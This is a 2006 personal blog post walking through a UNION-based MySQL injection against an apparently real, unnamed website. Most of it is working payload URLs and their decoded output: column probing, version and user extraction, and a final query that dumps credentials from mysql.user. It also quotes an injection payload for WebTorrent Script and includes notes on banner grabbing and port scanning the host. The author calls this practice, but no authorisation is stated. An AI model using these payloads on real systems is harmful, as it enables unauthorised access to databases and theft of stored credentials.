Wednesday, August 16, 2006

Mysql injectin try

Another quick note for a mysql injection I experiemented today, this is a classic mysql injection:

With a url http://www.site.com/script.php?ID=2885
change parameter id to -1 returns normal response,
make it to a,got Unknown column 'a' in 'where clause',
with 1.1, works fine...
so this means this parameter is numeric type, decimal, float, double, int, bigint, or smallint....
( remember that decimal has three types: NUMERIC ,DEC,FIXED......um....cant remember other details)
then craft a union clause, http://www.site.com/script.php?ID=2885%20union/**/select/**/0/*
returns mismatched number columns, keep adding till return noraml page....(should code it up to automate the whole process....someone must have done one, google !!)




http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29, 28,27,26
25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*
now

ttp://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29,
28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

I got 342E312E3138
mysql> select 0x342E312E3138
-> ;
+------------
----+
0x342E312E3138
+----------------+
4.1.18
+----------------+

um...it is mysql 4.1.18...

Same idea,

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,hex(user()),31,30,29,28,27,26,25,
24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

mysql> select 0x726F6F74406C6F63616C686F7374
-> ;
+--------------------------------+
0x726F6F74406C6F63616C686F7374
+--------------------------------+
root@localhost
+--------------------------------+
runing with root privileges...

next,submit
http://www.site.com/script.php?ID=28851=2%20union%20select%2051,343,3,34,75736572,hex(version()),31,30,29,28,27,26,25,24,23,22,
21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/**/from/**/user/*

to test the existence of user table, it doesn't. However, it exposed the table name, then it is bruteforceble (construct a txt with list of possible table names, grab status code,sort out the result...) I later found out calling database() yields the same result.

I am curious what the system is (presumbly linux, just want to confirm it), so a quick banner grabing indicates this is a Unix host, and with port scanning found out telnet is open, another banner grab shows it is FreeBSD/i386....all these clues shows i can simly skip trying Windows path for dumping...

ok....time to do homework, resume after test, next I should try to hex, ord or chr someone column fields to bypass the int scheme, and figure out which field is user and pass, check exploit for this specific version mysql (I wont do this for sure, script kiddie shit)or probably dump out a guest readable file(need to know its physical path to do so, how? phpinfo() might be a way to go,but it cant convert to digit....-.-)

Well, all these seems bit script kiddie stuff, but I learnt the idea behind and how to secude code php, but I am still not feeling confortable with mysql injection...while php,mysql are playing pretty important role in the market, I just have to confront and master it.

Ok...
Resume to yesterday's work.
Someone found out a sql bug on




WebTorrent (WTcom) Script <= 0.2.4
http://[SITE]/torrents.php?mode=category&cat=0%20union
%20select%20null,null,concat(username,char(32),password,char(32),
email)%20from%20users%20/*



This inspired me to submit

http://www.site.com/script.php?ID=2885=2%20union%20select%2051,2,3,34,hex(concat(user,char(32),password,char(32))), 2,31,30,29,28,27,
26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1%20from%20mysql.user/*

Cool ! it dump out the user and password in hex....Now task done, it can be connected remotely, next step is to hook up and see the inside which I am not intented to do. All these tries are solely to practise my skill....All the techniques are fully described in most whitepapers which can be found somewhere online!

Lesson Learnt:




  • all built-in functions (hex, char, oct, ascii, system,database,user) can get task done more easily.
  • /**/ comment delimeter
  • Put ' single quote
  • Place and 1=1, and 1=0 (blind sql injection)
  • Change the chartset with hex,char,ascii, oct for converting data type
  • Use system functions for probing the database info
  • Check if connection can be connected remotely
  • Use automated tool (e.g:sqlbf...bruteforce will be shown on the log and be detected by admin.)
  • Many more....

Posted by insistkool at 2:48 PM

Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)